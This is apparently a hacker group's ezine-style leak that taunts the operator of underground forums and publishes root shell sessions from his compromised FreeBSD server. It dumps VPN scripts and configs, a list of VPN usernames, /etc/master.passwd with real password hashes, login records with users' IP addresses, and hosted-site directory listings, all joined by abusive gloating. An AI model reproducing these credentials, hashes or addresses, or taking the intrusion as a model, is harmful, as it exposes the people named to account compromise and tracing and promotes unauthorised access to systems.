#!/bin/sh if [ $# -lt 1 ] then echo $0 user exit fi if ! echo $1 | grep -q -e "^[a-zA-Z0-9]*$" then echo "Invalid User" exit fi user=$1 dir=`pwd` echo "`date`: $user" >> vpnCreateLog cd /etc/openvpn/easy-rsa/2.0 #MAD AES-1024 RIGHT HEEEERE source ./vars >> /dev/null 2> /dev/null ./build-key --batch $user >> /dev/null 2> /dev/null fn=`echo "${user}${RANDOM}_OPENVPN.tgz"` cd keys/ sed -e "s/_NAME_/$user/g" client.conf > ${user}_OVPN.ovpn tar cfz $fn $user.crt $user.key ca.crt ${user}_OVPN.ovpn mv $fn /var/www/ cd $dir echo $fn # cd /etc/openvpn/ && ls -la total 48 drwxr-xr-x 4 root root 4096 Sep 17 03:20 . drwxr-xr-x 70 root root 4096 Jan 7 19:07 .. drwxr-xr-x 2 root root 4096 May 9 2010 certs -rw-r--r-- 1 root root 3427 May 9 2010 client.conf drwxr-xr-x 4 root root 4096 May 9 2010 easy-rsa -rw------- 1 root root 1187 Jan 7 21:44 ipp.txt ---------- 1 root root 356 May 12 2010 openvpn-status.log ---------- 1 root root 160 May 18 2010 openvpn.log -rw-r--r-- 1 root root 10388 Aug 9 23:09 server.conf -rw------- 1 root root 0 May 18 2010 status.log -rwxr-xr-x 1 root root 1352 Sep 18 2008 update-resolv-conf # cat ipp.txt Dukeraider,10.8.0.4 WEEDtwo,10.8.0.8 elektro,10.8.0.12 21Kms,10.8.0.16 darkt0wn,10.8.0.20 hi,10.8.0.24 w333d,10.8.0.28 SleepyHollow,10.8.0.32 HonigMelone,10.8.0.36 SmileNike,10.8.0.40 becks,10.8.0.44 sunrise,10.8.0.48 papa42,10.8.0.52 malakas2,10.8.0.56 Fahne,10.8.0.60 freshestman,10.8.0.64 kobra,10.8.0.68 Thunder0,10.8.0.72 juden,10.8.0.76 b7231,10.8.0.80 mablutze,10.8.0.84 Kerber0s,10.8.0.88 Loader,10.8.0.92 latestnews,10.8.0.96 Sa1nt8564,10.8.0.100 SilverFox,10.8.0.104 nate23,10.8.0.108 pan1c,10.8.0.112 Ginal406,10.8.0.116 Mantis70,10.8.0.120 kstARRR,10.8.0.124 h3l0x,10.8.0.128 reideen,10.8.0.132 conviction,10.8.0.136 awesome,10.8.0.140 recoilcontrol,10.8.0.144 jack123,10.8.0.148 chiller1337,10.8.0.152 hung2304,10.8.0.156 Tiberius,10.8.0.160 Kolumbus,10.8.0.164 Delphinko,10.8.0.168 McKnad,10.8.0.172 Kamill,10.8.0.176 kevin4ual,10.8.0.180 SleepyHollow,10.8.0.184 N3v10,10.8.0.188 shore,10.8.0.192 kingpok,10.8.0.196 xStream,10.8.0.200 Kasanova,10.8.0.204 andreas7411,10.8.0.208 slic3menic3,10.8.0.212 FaxXer,10.8.0.216 Pitbull69,10.8.0.220 b1111,10.8.0.224 obama123,10.8.0.228 Alanka,10.8.0.232 oicw91,10.8.0.236 weeman,10.8.0.240 fuckdawn,10.8.0.244 docscanner,10.8.0.248 # cat server.conf ################################################# # Sample OpenVPN 2.0 config file for # # multi-client server. # # # # This file is for the server side # # of a many-clients <-> one-server # # OpenVPN configuration. # # # # OpenVPN also supports # # single-machine <-> single-machine # # configurations (See the Examples page # # on the web site for more info). # # # # This config should work on Windows # # or Linux/BSD systems. Remember on # # Windows to quote pathnames and use # # double backslashes, e.g.: # # "C:\\Program Files\\OpenVPN\\config\\foo.key" # # # # Comments are preceded with '#' or ';' # ################################################# # Which local IP address should OpenVPN # listen on? (optional) ;local a.b.c.d # Which TCP/UDP port should OpenVPN listen on? # If you want to run multiple OpenVPN instances # on the same machine, use a different port # number for each one. You will need to # open up this port on your firewall. port 1194 # TCP or UDP server? ;proto tcp proto udp # "dev tun" will create a routed IP tunnel, # "dev tap" will create an ethernet tunnel. # Use "dev tap0" if you are ethernet bridging # and have precreated a tap0 virtual interface # and bridged it with your ethernet interface. # If you want to control access policies # over the VPN, you must create firewall # rules for the the TUN/TAP interface. # On non-Windows systems, you can give # an explicit unit number, such as tun0. # On Windows, use "dev-node" for this. # On most systems, the VPN will not function # unless you partially or fully disable # the firewall for the TUN/TAP interface. ;dev tap dev tun # Windows needs the TAP-Win32 adapter name # from the Network Connections panel if you # have more than one. On XP SP2 or higher, # you may need to selectively disable the # Windows firewall for the TAP adapter. # Non-Windows systems usually don't need this. ;dev-node MyTap # SSL/TLS root certificate (ca), certificate # (cert), and private key (key). Each client # and the server must have their own cert and # key file. The server and all clients will # use the same ca file. # # See the "easy-rsa" directory for a series # of scripts for generating RSA certificates # and private keys. Remember to use # a unique Common Name for the server # and each of the client certificates. # # Any X509 key management system can be used. # OpenVPN can also use a PKCS #12 formatted key file # (see "pkcs12" directive in man page). ca certs/ca.crt cert certs/server.crt key certs/server.key # This file should be kept secret # Diffie hellman parameters. # Generate your own with: # openssl dhparam -out dh1024.pem 1024 # Substitute 2048 for 1024 if you are using # 2048 bit keys. dh certs/dh1024.pem # Configure server mode and supply a VPN subnet # for OpenVPN to draw client addresses from. # The server will take 10.8.0.1 for itself, # the rest will be made available to clients. # Each client will be able to reach the server # on 10.8.0.1. Comment this line out if you are # ethernet bridging. See the man page for more info. server 10.8.0.0 255.255.255.0 # Maintain a record of client <-> virtual IP address # associations in this file. If OpenVPN goes down or # is restarted, reconnecting clients can be assigned # the same virtual IP address from the pool that was # previously assigned. ifconfig-pool-persist ipp.txt # Configure server mode for ethernet bridging. # You must first use your OS's bridging capability # to bridge the TAP interface with the ethernet # NIC interface. Then you must manually set the # IP/netmask on the bridge interface, here we # assume 10.8.0.4/255.255.255.0. Finally we # must set aside an IP range in this subnet # (start=10.8.0.50 end=10.8.0.100) to allocate # to connecting clients. Leave this line commented # out unless you are ethernet bridging. ;server-bridge 10.8.0.4 255.255.255.0 10.8.0.50 10.8.0.100 # Configure server mode for ethernet bridging # using a DHCP-proxy, where clients talk # to the OpenVPN server-side DHCP server # to receive their IP address allocation # and DNS server addresses. You must first use # your OS's bridging capability to bridge the TAP # interface with the ethernet NIC interface. # Note: this mode only works on clients (such as # Windows), where the client-side TAP adapter is # bound to a DHCP client. ;server-bridge # Push routes to the client to allow it # to reach other private subnets behind # the server. Remember that these # private subnets will also need # to know to route the OpenVPN client # address pool (10.8.0.0/255.255.255.0) # back to the OpenVPN server. ;push "route 192.168.10.0 255.255.255.0" ;push "route 192.168.20.0 255.255.255.0" # To assign specific IP addresses to specific # clients or if a connecting client has a private # subnet behind it that should also have VPN access, # use the subdirectory "ccd" for client-specific # configuration files (see man page for more info). # EXAMPLE: Suppose the client # having the certificate common name "Thelonious" # also has a small subnet behind his connecting # machine, such as 192.168.40.128/255.255.255.248. # First, uncomment out these lines: ;client-config-dir ccd ;route 192.168.40.128 255.255.255.248 # Then create a file ccd/Thelonious with this line: # iroute 192.168.40.128 255.255.255.248 # This will allow Thelonious' private subnet to # access the VPN. This example will only work # if you are routing, not bridging, i.e. you are # using "dev tun" and "server" directives. # EXAMPLE: Suppose you want to give # Thelonious a fixed VPN IP address of 10.9.0.1. # First uncomment out these lines: ;client-config-dir ccd ;route 10.9.0.0 255.255.255.252 # Then add this line to ccd/Thelonious: # ifconfig-push 10.9.0.1 10.9.0.2 # Suppose that you want to enable different # firewall access policies for different groups # of clients. There are two methods: # (1) Run multiple OpenVPN daemons, one for each # group, and firewall the TUN/TAP interface # for each group/daemon appropriately. # (2) (Advanced) Create a script to dynamically # modify the firewall in response to access # from different clients. See man # page for more info on learn-address script. ;learn-address ./script # If enabled, this directive will configure # all clients to redirect their default # network gateway through the VPN, causing # all IP traffic such as web browsing and # and DNS lookups to go through the VPN # (The OpenVPN server machine may need to NAT # or bridge the TUN/TAP interface to the internet # in order for this to work properly). push "redirect-gateway def1" push "dhcp-option DNS 92.241.168.201" # Certain Windows-specific network settings # can be pushed to clients, such as DNS # or WINS server addresses. CAVEAT: # http://openvpn.net/faq.html#dhcpcaveats # The addresses below refer to the public # DNS servers provided by opendns.com. ;push "dhcp-option DNS 208.67.222.222" ;push "dhcp-option DNS 208.67.220.220" # Uncomment this directive to allow different # clients to be able to "see" each other. # By default, clients will only see the server. # To force clients to only see the server, you # will also need to appropriately firewall the # server's TUN/TAP interface. ;client-to-client # Uncomment this directive if multiple clients # might connect with the same certificate/key # files or common names. This is recommended # only for testing purposes. For production use, # each client should have its own certificate/key # pair. # # IF YOU HAVE NOT GENERATED INDIVIDUAL # CERTIFICATE/KEY PAIRS FOR EACH CLIENT, # EACH HAVING ITS OWN UNIQUE "COMMON NAME", # UNCOMMENT THIS LINE OUT. ;duplicate-cn # The keepalive directive causes ping-like # messages to be sent back and forth over # the link so that each side knows when # the other side has gone down. # Ping every 10 seconds, assume that remote # peer is down if no ping received during # a 120 second time period. keepalive 10 120 # For extra security beyond that provided # by SSL/TLS, create an "HMAC firewall" # to help block DoS attacks and UDP port flooding. # # Generate with: # openvpn --genkey --secret ta.key # # The server and each client must have # a copy of this key. # The second parameter should be '0' # on the server and '1' on the clients. ;tls-auth ta.key 0 # This file is secret # Select a cryptographic cipher. # This config item must be copied to # the client config file as well. ;cipher BF-CBC # Blowfish (default) ;cipher AES-128-CBC # AES ;cipher DES-EDE3-CBC # Triple-DES # Enable compression on the VPN link. # If you enable it here, you must also # enable it in the client config file. comp-lzo # The maximum number of concurrently connected # clients we want to allow. ;max-clients 100 # It's a good idea to reduce the OpenVPN # daemon's privileges after initialization. # # You can uncomment this out on # non-Windows systems. ;user nobody ;group nogroup # The persist options will try to avoid # accessing certain resources on restart # that may no longer be accessible because # of the privilege downgrade. persist-key persist-tun # Output a short status file showing # current connections, truncated # and rewritten every minute. status /dev/null #status.log # By default, log messages will go to the syslog (or # on Windows, if running as a service, they will go to # the "\Program Files\OpenVPN\log" directory). # Use log or log-append to override this default. # "log" will truncate the log file on OpenVPN startup, # while "log-append" will append to it. Use one # or the other (but not both). log /dev/null ;log-append openvpn.log # Set the appropriate level of log # file verbosity. # # 0 is silent, except for fatal errors # 4 is reasonable for general usage # 5 and 6 can help to debug connection problems # 9 is extremely verbose verb 0 # Silence repeating messages. At most 20 # sequential messages of the same message # category will be output to the log. ;mute 20 crl-verify /etc/openvpn/easy-rsa/2.0/keys/crl.pem $ cat /etc/sockd.conf # $Id: sockd.conf,v 1.49 2009/10/27 11:56:55 karls Exp $ # # A sample sockd.conf # # # The configfile is divided into three parts; # 1) serversettings # 2) rules # 3) routes # # The recommended order is: # Serversettings: # logoutput # internal # external # method # clientmethod # users # compatibility # extension # timeout # srchost # # Rules: # client block/pass # from to # libwrap # log # # block/pass # from to # method # command # libwrap # log # protocol # proxyprotocol # # Routes: # the server will log both via syslog, to stdout and to /var/log/lotsoflogs #logoutput: syslog stdout /var/log/lotsoflogs logoutput: /dev/null # The server will bind to the address 10.1.1.1, port 1080 and will only # accept connections going to that address. internal: 92.241.190.253 port = 14421 # Alternatively, the interface name can be used instead of the address. #internal: eth0 port = 1080 # all outgoing connections from the server will use the IP address # 195.168.1.1 external: 92.241.190.253 # list over acceptable methods, order of preference. # A method not set here will never be selected. # # If the method field is not set in a rule, the global # method is filled in for that rule. # # methods for socks-rules. method: username #none #rfc931 # methods for client-rules. #clientmethod: none #or if you want to allow rfc931 (ident) too #method: username rfc931 none #or for PAM authentification #method: pam # # User identities, an important section. # # when doing something that can require privilege, it will use the # userid "sockd". #user.privileged: sockd # when running as usual, it will use the unprivileged userid of "sockd". #user.unprivileged: sockd # If you compiled with libwrap support, what userid should it use # when executing your libwrap commands? "libwrap". #user.libwrap: libwrap # # Some options to help clients with compatibility: # # when a client connection comes in the socksserver will try to use # the same port as the client is using, when the socksserver # goes out on the clients behalf (external: IP address). # If this option is set, Dante will try to do it for reserved ports aswell. # This will usually require user.privileged to be set to "root". #compatibility: sameport # If you are using the bind extension and have trouble running servers # via the server, you might try setting this. The consequences of it # are unknown. #compatibility: reuseaddr # # The Dante server supports some extensions to the socks protocol. # These require that the socks client implements the same extension and # can be enabled using the "extension" keyword. # # enable the bind extension. #extension: bind # # Misc options. # # how many seconds can pass from when a client connects til it has # sent us it's request? Adjust according to your network performance # and methods supported. #timeout.negotiate: 30 # on a lan, this should be enough. # how many seconds can the client and it's peer idle without sending # any data before we dump it? Unless you disable tcp keep-alive for # some reason, it's probably best to set this to 0, which is # "forever". timeout.io: 0 # or perhaps 86400, for a day. # do you want to accept connections from addresses without # dns info? what about addresses having a mismatch in dnsinfo? #srchost: nounknown nomismatch # # The actual rules. There are two kinds and they work at different levels. # # The rules prefixed with "client" are checked first and say who is allowed # and who is not allowed to speak/connect to the server. I.e the # ip range containing possibly valid clients. # It is especially important that these only use IP addresses, not hostnames, # for security reasons. # # The rules that do not have a "client" prefix are checked later, when the # client has sent its request and are used to evaluate the actual # request. # # The "to:" in the "client" context gives the address the connection # is accepted on, i.e the address the socksserver is listening on, or # just "0.0.0.0/0" for any address the server is listening on. # # The "to:" in the non-"client" context gives the destination of the clients # socksrequest. # # "from:" is the source address in both contexts. # # # The "client" rules. All our clients come from the net 10.0.0.0/8. # # Allow our clients, also provides an example of the port range command. client pass { from: 0.0.0.0/0 port 1-65535 to: 0.0.0.0/0 #method: rfc931 # match all idented users that also are in passwordfile } # This is identical to above, but allows clients without a rfc931 (ident) # too. In practise this means the socksserver will try to get a rfc931 # reply first (the above rule), if that fails, it tries this rule. #client pass { # from: 10.0.0.0/8 port 1-65535 to: 0.0.0.0/0 #} # drop everyone else as soon as we can and log the connect, they are not # on our net and have no business connecting to us. This is the default # but if you give the rule yourself, you can specify details. #client block { # from: 0.0.0.0/0 to: 0.0.0.0/0 # log: connect error #} # the rules controlling what clients are allowed what requests # # you probably don't want people connecting to loopback addresses, # who knows what could happen then. #block { # from: 0.0.0.0/0 to: lo0 # log: connect error #} # the people at the 172.16.0.0/12 are bad, no one should talk to them. # log the connect request and also provide an example on how to # interact with libwrap. #block { # from: 0.0.0.0/0 to: 172.16.0.0/12 # libwrap: spawn finger @%a # log: connect error #} # unless you need it, you could block any bind requests. #block { # from: 0.0.0.0/0 to: 0.0.0.0/0 # command: bind # log: connect error #} # or you might want to allow it, for instance "active" ftp uses it. # Note that a "bindreply" command must also be allowed, it # should usually by from "0.0.0.0/0", i.e if a client of yours # has permission to bind, it will also have permission to accept # the reply from anywhere. pass { from: 0.0.0.0/0 to: 0.0.0.0/0 # command: bind # log: connect error } # some connections expect some sort of "reply", this might be # the reply to a bind request or it may be the reply to a # udppacket, since udp is packetbased. # Note that nothing is done to verify that it's a "genuine" reply, # that is in general not possible anyway. The below will allow # all "replies" in to your clients at the 10.0.0.0/8 net. #pass { # from: 0.0.0.0/0 to: 10.0.0.0/8 # command: bindreply udpreply # log: connect error #} # pass any http connects to the example.com domain if they # authenticate with username. # This matches "example.com" itself and everything ending in ".example.com". #pass { # from: 10.0.0.0/8 to: .example.com port = http # log: connect error # method: username #} # block any other http connects to the example.com domain. #block { # from: 0.0.0.0/0 to: .example.com port = http # log: connect error #} # everyone from our internal network, 10.0.0.0/8 is allowed to use # tcp and udp for everything else. #pass { # from: 10.0.0.0/8 to: 0.0.0.0/0 # protocol: tcp udp #} # last line, block everyone else. This is the default but if you provide # one yourself you can specify your own logging/actions #block { # from: 0.0.0.0/0 to: 0.0.0.0/0 # log: connect error #} # route all http connects via an upstream socks server, aka "server-chaining". #route { # from: 10.0.0.0/8 to: 0.0.0.0/0 port = http via: socks.example.net port = socks #} All in all this really shouldn't surprise anyone. Carders.cc was told to fuck off twice now and we're tired of cleaning their shit up. Seriously, it's not a secret that carders.cc's team members are a bit dim, though even they should have got the hint by now. Why don't you go out, steal some handbags or whatever scum does at your age? This is not only a warning to you but also to your users; don't put your trust in admins that are that fucking incapable, because if you do, you will be owned and your data will be exp0sed. - AGAIN - ,;~;, /\_ ( / (() //) | \\ ,,;;'\ __ _( )m=((((((((((((((========{ Undercover.su }======------- /' ' '()/~' '.(, | ,;( )|| | ~ k!LLu, well, what can be said about him? He's ,;' \ /-(.;, ) probably the most attention-whoring and at the ) / ) / same time the most hated kid around. He spends // || his time lurking around on kiddyboards, bragging )_\ )_\ about his imaginary achievements and skills. He changes his nickname more frequently than his underwear but usually gets uncovered instantly due to his obtrusive arrogance and stupidity. All in all he is hands-down the most annoying little brat around. Clearly, this self-proclaimed hosting-pro and his most recent strokes of genius "Secure-Host", "Undercover.su" and "Snap Reloaded" have to be dealt with. k!LLu aka s1mpl3x aka purplera1n gave his best to make his board ("application only") look more private and exclusive than a dinner with the president. Probably this is why even Fukushima looks crowded compared to undercover.su. But what can we say? He begged for it so we owned him anyway; in fact we're presenting you all of his "projects" torn to pieces. ____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | k!LLu: erstens | | k!LLu: entscheide ich ob es ein board gibt oder nich | |____________________________________________________________________| k!LLu decides if a messageboard exists or not! It's no secret that he is a bit delusional and tends to get stuff mixed up. But, admit it, his ramblings are kind of fun to read and we look forward to seeing what he comes up with to explain him being owned and exposed. ___________________________________________________________________ _ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | k!LLu: profis ???? | | LOOOOOOOOOL | | | | 1337Crew, Public lücke in der SB | | Carders, Public lücke im SMF | | Carders #2 , [0-day]24.12.2010 vbulletin 4.0p1Exploit | | | | scriptkiddys.... nothing serverside... | | | | wäre ich früher aufgestanden hätte dort undercover | | gestanden :/ | | | | Die Admins sind einfach zu daemlich.... | | Crimenetwork -- MostHated&Unhacked | |____________________________________________________________________| k!LLu basically says that 1337crew and carders.cc were hacked with public exploits by amateurs. He would have done it himself if he hadn't slept so long. The main question here is whether he himself believes this bullshit. But seriously, he can't be that dumb. Crimenetwork, the predecessor of undercover.su, was destined to fail from the beginning since k!LLu has always been trying to create the image of the knowledgeable hacker and admin he clearly is not. To promote his projects he apparently doesn't back off from talking about public vulnerabilities that never existed or exploits he'd never get his hands on. It must be really depressing to have never even seen or possesed a 0day when one is immensely desperate to make others believe so. The sad thing actually is that his constant lying is believed by people incapable of checking simple facts. But just imagine this poor little guy trying to insult the hackers who are just watching him typing it, failing to understand that he is just one of many Trumans in our show. We hope that this ezine can once and for all depict k!LLu as the cocky kid he is. When trying not to puke while surfing Undercover.su we stumbled upon some rumors. One of which stated that we are Global Evolution - a private little German fag community that tries to explain security vulnerabilities by blogging videos about XSS. No we're not Global Evolution. If anything, we are evolution. We lend a hand to natural selection, by helping to wipe out the weak ones. And, believe us or not, k!LLu and his projects deserve to be wiped out more than anybody or anything else. We keep the show going ... # uname -a FreeBSD 8.2-RELEASE-p3 #4: Thu Sep 29 14:54:55 MSD 2011 # id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) # cat /etc/passwd # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin ucsu:*:1002:1002:User &:/home/ucsu:/usr/local/bin/bash true:*:1003:1003:User &:/home/true:/sbin/nologin symb:*:1006:1006:User &:/home/symb:/bin/sh hosting:*:1008:1008:User &:/home/hosting:/sbin/nologin gtbros:*:1001:1001:User &:/home/gtbros:/sbin/nologin relite:*:1007:1007:User &:/home/relite:/bin/sh wayne:*:1004:1004:User &:/home/wayne:/sbin/nologin ixde:*:1009:1009:User &:/home/ixde:/sbin/nologin backspace:*:1005:1005:User &:/home/backspace:/bin/sh lcf:*:1000:1000:User &:/home/lcf:/bin/sh # cat /etc/master.passwd # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ # root:$1$bqzBFX0T$LkqVd6ktOTUX0qtY3W8fA1:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root: daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5::0:0:System &:/:/usr/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin ucsu:$1$rkQkyHD4$SPar9t/apgqXI9iBUBSh/0:1002:1002::0:0:User &:/home/ucsu:/usr/local/bin/bash true:$1$bWcK0H74$NTULoy82dfWaevrF2Hf.T/:1003:1003::0:0:User &:/home/true:/sbin/nologin symb:$1$Lx5.ll9w$uMdF6FKqh4TuC5QuazVQ31:1006:1006::0:0:User &:/home/symb:/bin/sh hosting:$1$ptOUAPmM$7N/IB1xCXt9x.ft34Dlk/.:1008:1008::0:0:User &:/home/hosting:/sbin/nologin gtbros:$1$atXPT9B1$qNpYOTWDHlcis3ldbFSjg/:1001:1001::0:0:User &:/home/gtbros:/sbin/nologin relite:$1$c7m4u7CP$P6QVZVnvxhIqvJRAoZ87j0:1007:1007::0:0:User &:/home/relite:/bin/sh wayne:$1$SCxNrKiE$iA2K05rvKgbGW/yrdqlVn1:1004:1004::0:0:User &:/home/wayne:/sbin/nologin ixde:$1$te1KzFVe$gRVE863DVX8QmLT.Tpsvp0:1009:1009::0:0:User &:/home/ixde:/sbin/nologin backspace:$1$ZPiFb/ga$z0cTF3T8CV7m0guoYVsJJ/:1005:1005::0:0:User &:/home/backspace:/bin/sh lcf:$1$85k5c7VQ$5nqIFiZbOBFD5Z9LTxmd1.:1000:1000::0:0:User &:/home/lcf:/bin/sh # last ixde ftp 94.220.134.71 Tue Oct 11 17:33 - 17:44 (00:10) ixde ftp 85.17.97.27 Tue Oct 11 17:25 - 17:27 (00:01) ixde ftp 85.17.97.27 Tue Oct 11 17:25 - 17:31 (00:06) ixde ftp 94.220.134.71 Tue Oct 11 16:37 - 16:41 (00:04) ixde ftp 94.220.134.71 Tue Oct 11 16:19 - 16:27 (00:07) ucsu ftp 193.107.17.239 Tue Oct 11 11:31 - 11:32 (00:00) ixde ftp 94.220.134.71 Mon Oct 10 15:44 - 15:48 (00:03) ixde ftp 94.220.134.71 Sun Oct 9 20:42 - 20:47 (00:04) ucsu ftp 77.20.18.64 Sat Oct 8 17:04 - 17:07 (00:03) ucsu ftp 77.20.18.64 Sat Oct 8 12:57 - 13:00 (00:03) ixde ftp 217.255.238.21 Fri Oct 7 14:18 - 14:21 (00:03) ixde ftp 217.255.238.21 Fri Oct 7 14:01 - 14:06 (00:04) ixde ftp 217.255.238.21 Fri Oct 7 13:56 - 13:58 (00:01) ixde ftp 217.255.238.21 Fri Oct 7 13:54 - 13:55 (00:01) ixde ftp 217.255.238.21 Fri Oct 7 13:54 - 13:57 (00:03) ixde ftp 217.255.238.21 Fri Oct 7 13:51 - 13:52 (00:01) ixde ftp 217.255.238.21 Fri Oct 7 13:49 - 13:52 (00:03) ixde ftp 217.255.238.21 Fri Oct 7 13:47 - 13:48 (00:01) ixde ftp 217.255.238.21 Fri Oct 7 13:45 - 13:48 (00:03) ixde ftp 217.255.238.21 Fri Oct 7 13:44 - 13:45 (00:01) ixde ftp 217.255.238.21 Fri Oct 7 13:42 - 13:44 (00:01) ixde ftp 94.220.134.71 Fri Oct 7 13:40 - 13:46 (00:05) ixde ftp 217.255.238.21 Fri Oct 7 13:39 - 13:45 (00:05) backspace ftp 217.23.8.127 Wed Oct 5 11:34 - 11:59 (00:24) ucsu ftp 77.20.18.64 Tue Oct 4 17:10 - 17:13 (00:03) backspace ftp 95.128.242.224 Mon Oct 3 22:29 - 22:39 (00:10) true ftp 77.20.18.64 Mon Oct 3 16:59 - 17:00 (00:01) true ftp 77.20.18.64 Mon Oct 3 16:58 - 16:59 (00:01) true ftp 77.20.18.64 Mon Oct 3 16:58 - 17:01 (00:03) true ftp 77.20.18.64 Mon Oct 3 16:54 - 16:57 (00:03) ixde ftp 94.220.134.71 Mon Oct 3 09:38 - 10:07 (00:29) ixde ftp 94.220.134.71 Mon Oct 3 09:11 - 09:17 (00:05) ixde ftp 94.220.134.71 Sun Oct 2 23:04 - 23:04 (00:00) ixde ftp 94.220.134.71 Sun Oct 2 23:01 - 23:04 (00:03) ixde ftp 94.220.134.71 Sun Oct 2 22:31 - 22:45 (00:13) ixde ftp 94.220.134.71 Sun Oct 2 22:29 - 22:45 (00:15) # host 77.20.18.64 64.18.20.77.in-addr.arpa domain name pointer 77-20-18-64-dynip.superkabel.de. # there we go^C # cd /home/ucsu # ls -la total 32 drwxr-x--- 8 ucsu www 512 Aug 16 17:06 . drwxr-x--x 13 root wheel 512 Sep 22 21:06 .. drwxrwx--- 2 ucsu www 512 May 6 13:08 abuse.undercover.su drwxrwx--- 2 ucsu www 512 Aug 16 00:12 delict.cc drwxrwx--- 2 ucsu www 512 Apr 13 13:04 moneymake.us drwxrwx--- 3 ucsu www 512 Apr 7 2011 scene-sector.to drwxrwx--- 2 ucsu www 2048 Oct 11 19:57 temp drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 undercover.su # cd abuse.undercover.su # ls -la total 12 drwxrwx--- 2 ucsu www 512 May 6 13:08 . drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. -rw-r--r-- 1 ucsu www 1034 May 6 13:08 index.html # cd .. # cd delict.cc # ls -la total 100 drwxrwx--- 2 ucsu www 512 Aug 16 00:12 . drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. -rw-r--r-- 1 ucsu www 423 Aug 15 23:46 index.php -rw-r--r-- 1 ucsu www 44909 Aug 16 00:12 mainlogo.png # cd .. # cd moneymake.us # ls -la total 12 drwxrwx--- 2 ucsu www 512 Apr 13 13:04 . drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. -rw-r--r-- 1 root www 261 Apr 13 13:04 index.php # cat index.php <html> <head> <title>Undercover.SU Sie werden weitergeleitet... # cd .. # cd scene-sector.to # ls -la total 16 drwxrwx--- 3 ucsu www 512 Apr 7 2011 . drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. -rw-r--r-- 1 root www 261 Apr 5 2011 index.php drwxr-xr-x 6 root www 512 Apr 9 2011 test # cd test # ls -la total 24 drwxr-xr-x 6 root www 512 Apr 9 2011 . drwxrwx--- 3 ucsu www 512 Apr 7 2011 .. drwxrwxrwx 3 root www 512 Apr 7 2011 4234047??hscjfsjdf89ds89898j34jjfdhhs9322jss drwxr-xr-x 5 root www 512 Apr 7 2011 admin drwxr-xr-x 3 root www 512 Apr 7 2011 designe drwxr-xr-x 3 root www 512 Apr 9 2011 img # ls -la total 15032 drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 . drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. drwxr-xr-x 8 root www 512 Apr 30 00:07 .trash -rw-r--r-- 1 root www 1799843 May 5 18:04 